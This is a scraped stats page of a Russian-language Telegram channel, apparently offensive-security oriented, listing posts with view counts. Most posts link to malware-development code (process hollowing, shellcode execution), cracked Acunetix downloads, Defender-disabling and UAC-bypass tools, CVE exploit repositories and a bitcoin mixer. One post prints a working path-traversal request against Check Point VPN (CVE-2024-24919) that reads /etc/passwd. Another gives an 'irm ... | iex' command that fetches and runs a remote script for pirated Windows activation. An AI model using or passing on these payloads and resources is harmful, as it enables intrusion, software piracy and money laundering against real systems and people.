Freedom F0x
Information must be flow free money kill it [email protected] Облако тэгов - https://t.me/freedomf0x/9087 Рекламу не размещаем! Все материалы исключительно в образовательных целях. Ответственность за использование не несём.
Больше44 231
Подписчики
+2524 часа
+2767 дней
+97030 дней
Время активного постинга
Загрузка данных...
Find out who reads your channel
This graph will show you who besides your subscribers reads your channel and learn about other sources of traffic.Анализ публикаций
Посты | Просмотры | Поделились | Динамика просмотров |
01 #Malware Dev
https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Process/remote_mapping_injection.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/shellcode_exec/Shell-Exec_fnPointer.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Process/process_hollowing.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/dll_injection/dll_unhooking.rs | 367 | 22 | Loading... |
02 #Киберспорт
https://cyber.sports.ru/tribuna/blogs/nejournalist/3244234.html | 1 653 | 9 | Loading... |
03 https://www.youtube.com/watch?v=LGhb2BIYlGg
#biohacking
https://www.youtube.com/watch?v=8ARaWK_S7dY | 4 335 | 52 | Loading... |
04 #FuckSMB
https://github.com/p0dalirius/smbclient-ng | 4 551 | 65 | Loading... |
05 Media files | 6 138 | 186 | Loading... |
06 #Android | 6 079 | 80 | Loading... |
07 #Acunetix v24.4.240514098 - 16 May 2024
Windows: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Windows-Pwn3rzs-CyberArsenal.rar
Linux: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Linux-Pwn3rzs-CyberArsenal.7z
Glory Glory #Pwn3rzs | 6 656 | 88 | Loading... |
08 Media files | 6 850 | 111 | Loading... |
09 #PHP | 6 719 | 32 | Loading... |
10 Media files | 6 574 | 202 | Loading... |
11 #AD | 6 526 | 71 | Loading... |
12 #OSINT
CCTV Close-Circuit Telegram Vision) - получаем геолокацию пользователя #Telegram с точно до 50-100м в реальном времени. | 7 584 | 240 | Loading... |
13 #CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), с привилегиями root. Уязвимыми являются следующие продукты:
- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances
- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20
#POC
POST /clients/MyCRL HTTP/1.1
Host: target_host
Content-Length: 63
aCSHELL/../../../../../../../etc/passwd | 9 471 | 139 | Loading... |
14 #report | 8 849 | 134 | Loading... |
15 Media files | 8 873 | 40 | Loading... |
16 Media files | 12 542 | 186 | Loading... |
17 Media files | 9 221 | 45 | Loading... |
18 Удобство в развёртывание лабораторий для тестирования своих нагрузок:
Системы:
https://uupdump.net
Пролечка: https://github.com/massgravel/Microsoft-Activation-Scripts
irm https://get.activated.win | iex | 13 201 | 127 | Loading... |
19 Media files | 11 853 | 77 | Loading... |
20 Media files | 12 006 | 106 | Loading... |
21 Media files | 11 587 | 30 | Loading... |
22 #CVE-2024-26238: #WINDOWS 10 PLUGSCHEDULER ELEVATION OF PRIVILEGE
https://www.synacktiv.com/advisories/windows-10-plugscheduler-elevation-of-privilege | 11 534 | 102 | Loading... |
23 #ЦитатаДня
"Когда тебя отлучили от улицы и ты пошёл в чушпаны, не стоит завидовать доходам пацанов! Львиная доля того что по хоть и короткой жизни тебя ждут одни лишь потери потерь. Помни это!" | 13 692 | 17 | Loading... |
24 #Old_new_email_attacks
https://blog.slonser.info/posts/email-attacks/ | 12 031 | 74 | Loading... |
25 Media files | 11 737 | 223 | Loading... |
26 #intelligence | 10 556 | 62 | Loading... |
27 A Jambler.io partner mixer template for easy deployment on a Linux server. Includes the website template, the telegram bot and the rapid deployment script.
https://github.com/jambler-io/bitcoin-mixer | 10 213 | 94 | Loading... |
28 #Acunetix v24.4.240427095 - 30 Apr 2024
Windows: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240427095-Windows-Pwn3rzs-CyberArsenal.rar
Linux: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240427095-Linux-Pwn3rzs-CyberArsenal.7z
Glory Glory #Pwn3rzs | 10 488 | 118 | Loading... |
29 #threatleak
https://rt-solar.ru/solar-4rays/blog/4333/ | 11 355 | 45 | Loading... |
30 #PoC and detailed work about escaping from the #VM through two vulnerabilities: #CVE-2021-3929 and CVE-2021-3947 affecting QEMU/KVM due to holes in the design of recursive MMIO hypervisors.
CodeQL was mainly used to search for holes (flaws and #exploit primitives) | 1 | 0 | Loading... |
31 #FuckDefender
https://github.com/es3n1n/no-defender | 11 983 | 144 | Loading... |
32 #CVE-2024-21683: #Confluence Data Center #RCE
https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server | 11 603 | 81 | Loading... |
33 #TrollFuckUAC
https://github.com/cybersectroll/TrollUAC | 10 988 | 71 | Loading... |
34 #threatleak
https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ | 13 447 | 54 | Loading... |
35 A flexible tool for redirecting a given program's TCP traffic to #SOCKS5 or #HTTP #proxy.
https://github.com/hmgle/graftcp | 14 065 | 170 | Loading... |
36 Media files | 13 466 | 187 | Loading... |
37 Media files | 12 996 | 59 | Loading... |
38 Media files | 12 016 | 133 | Loading... |
39 #CVE-2024-27130 #QNAP
https://github.com/watchtowrlabs/CVE-2024-27130 | 12 391 | 66 | Loading... |
#Malware Dev
https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Process/remote_mapping_injection.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/shellcode_exec/Shell-Exec_fnPointer.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Process/process_hollowing.rs
https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/dll_injection/dll_unhooking.rs
Rust-for-Malware-Development/obfuscation at main · Whitecat18/Rust-for-Malware-Development
This repository contains my complete resources and coding practices for malware development using Rust 🦀. - Whitecat18/Rust-for-Malware-Development
Показать все...
Отцы-основатели. Как дружба, конкуренция и рестораны заложили фундамент российского киберспорта
История Антона Черепенникова и Димы Смелого
🐳 3
Показать все...
GitHub - p0dalirius/smbclient-ng: smbclient-ng, a fast and user friendly way to interact with SMB shares.
smbclient-ng, a fast and user friendly way to interact with SMB shares. - GitHub - p0dalirius/smbclient-ng: smbclient-ng, a fast and user friendly way to interact with SMB shares.
#Acunetix v24.4.240514098 - 16 May 2024
Windows: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Windows-Pwn3rzs-CyberArsenal.rar
Linux: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Linux-Pwn3rzs-CyberArsenal.7z
Glory Glory #Pwn3rzs
🐳 13